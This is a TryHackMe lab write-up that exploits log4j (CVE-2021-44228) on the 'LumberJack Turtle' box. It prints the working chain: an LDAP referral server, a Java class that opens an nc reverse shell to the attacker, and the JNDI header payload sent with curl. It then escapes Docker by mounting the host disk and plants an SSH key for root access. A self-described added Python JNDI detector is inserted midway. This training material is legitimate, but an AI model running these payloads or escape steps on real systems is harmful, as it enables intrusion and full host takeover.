LumberJack Turtle – Walkthrough En | TryHackMe – Write-up

No logs, no crime… so says the lumberjack.


LumberJack Turtle is a TryHackMe box in which log4j takes the spotlight.

It is perfect training for exploiting the CVE-2021-44228 vulnerability.

Enumeration

Command :

nmap -T5 -sV -p- 10.10.239.165

Web enumeration

Only port 80 is open. We will enumerate the existing directories on the target with Dirb.

Command :

dirb http://10.10.239.165

We have found a first directory; let's see whether there is another one beneath it.

Command :

dirb http://10.10.239.165/~logs

A new directory is found: log4j. We will therefore have to exploit this flaw. Before trying to get in, check whether the target is actually vulnerable.

This GitHub repository lets us test whether the target is vulnerable: https://github.com/fullhunt/log4j-scan

Command :

git clone https://github.com/fullhunt/log4j-scan

cd log4j-scan

pip3 install -r requirements.txt

Target scan :

python3.9 log4j-scan.py -u http://10.10.239.165/~logs/log4j

It's vulnerable... not that we had much doubt.

Little hint lost in the header...

It was well hidden, but it's worth it. It sits in the response headers of the /~logs/log4j page.

In the browser's developer tools (F12), we can see the hint among the headers: X-THM-HINT CVE-2021-44228 against X-Api-Version

Initial foothold - Exploitation

To exploit the flaw, there are several steps to put in place:

  • setting up a server that will answer the LDAP request (LDAP Referral Server)
  • writing the payload class in Java
  • serving the payload via an HTTP server
  • setting up a netcat listener
  • sending the malicious request.

LDAP Referral Server

First, clone this GitHub repository and build it:

Command :

git clone https://github.com/mbechler/marshalsec

cd marshalsec

mvn clean package -DskipTests

Setting up the server :

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit

Creating the payload class in Java

public class Exploit {
    // Static initializer: runs as soon as the vulnerable JVM loads this class
    // from the HTTP server, so the reverse shell starts without any method call.
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc 10.11.38.124 9999 -e /bin/bash");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Compilation

javac Exploit.java -source 8 -target 8

Serving the payload via an HTTP server

python3.9 -m http.server

Setting up a netcat listener

nc -nlvp 9999

Everything is ready !!!!

Send the malicious request.

curl -X GET http://10.10.239.165/~logs/log4j/ -H 'X-Api-Version: ${jndi:ldap://10.11.38.124:1389/Exploit}'
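As a defender-side counterpart to the request above, here is an added example (not part of the original write-up) in Python that scans raw HTTP request headers for the JNDI lookup string and extracts the referral target it would make the server contact. The sample request is a constructed copy of the curl call above; the Finding type, the regex and the default-port table are my own assumptions.

```python
import re
from typing import List, NamedTuple

# Matches ${jndi:<scheme>://<host>[:<port>][/<path>]} as it appears in the
# X-Api-Version header sent above. Case-insensitive: log4j accepts "JNDI" too.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi:(?P<scheme>ldaps?|rmi|dns)://"
    r"(?P<host>[^:/}\s]+)(?::(?P<port>\d{1,5}))?(?P<path>/[^}\s]*)?\s*\}",
    re.IGNORECASE,
)
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}


class Finding(NamedTuple):
    header: str
    scheme: str
    host: str
    port: int
    path: str


def parse_headers(raw_request: str) -> List[tuple]:
    """Return (name, value) pairs from a raw HTTP request; the request line is skipped."""
    pairs = []
    for line in raw_request.splitlines()[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")  # first colon only: values may contain ':'
        pairs.append((name.strip(), value.strip()))
    return pairs


def find_jndi_lookups(raw_request: str) -> List[Finding]:
    """One Finding per JNDI lookup in any header, with the referral target it points at."""
    findings = []
    for name, value in parse_headers(raw_request):
        for m in JNDI_LOOKUP.finditer(value):
            scheme = m.group("scheme").lower()
            port = int(m.group("port")) if m.group("port") else DEFAULT_PORTS[scheme]
            findings.append(Finding(name, scheme, m.group("host"), port, m.group("path") or "/"))
    return findings


# Constructed samples: a copy of the request the write-up sends, plus a benign one.
MALICIOUS_REQUEST = (
    "GET /~logs/log4j/ HTTP/1.1\r\nHost: 10.10.239.165\r\nUser-Agent: curl/7.68.0\r\n"
    "X-Api-Version: ${jndi:ldap://10.11.38.124:1389/Exploit}\r\nAccept: */*\r\n\r\n"
)
BENIGN_REQUEST = "GET /~logs/log4j/ HTTP/1.1\r\nHost: 10.10.239.165\r\nX-Api-Version: 1.2.3\r\n\r\n"
```

Call find_jndi_lookups on a captured request to get the list of hits. It matches the plain form this box uses; the real fix remains upgrading log4j, with -Dlog4j2.formatMsgNoLookups=true only a stopgap on the 2.10 to 2.14.1 releases.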

Privilege escalation

We land in a shell that cannot be upgraded to a proper TTY. Either way, we are root, but inside a container.

Flag 1

The 1st flag is at this location: /opt/

Escape from Docker

As with the Hamlet box (put the link), go to /dev and check which disks are present.

Command :

cd /dev

ls -al | grep disk

Then, we have to mount xvda1.

Command :

mkdir /mnt/xvda1

mount /dev/xvda1 /mnt/xvda1

Once it is mounted, we have access to the host's entire filesystem as root.

Flag 2

The second flag is harder to find and easy to miss. You have to look at the folder called «…»

Done !!!

SSH connection - Root

It is possible to connect via SSH. Once the xvda1 volume is mounted, we can add a public key to the authorized_keys file.

On Kali, create a private/public key pair:

Command :

ssh-keygen

Append the contents of id_rsa.pub:

echo 'key here' >> authorized_keys


That’s all folks

Thank you for taking the time to come to the site and read this write-up.

I hope it brought you something and taught you new things.

Feel free to leave a comment or share this article.
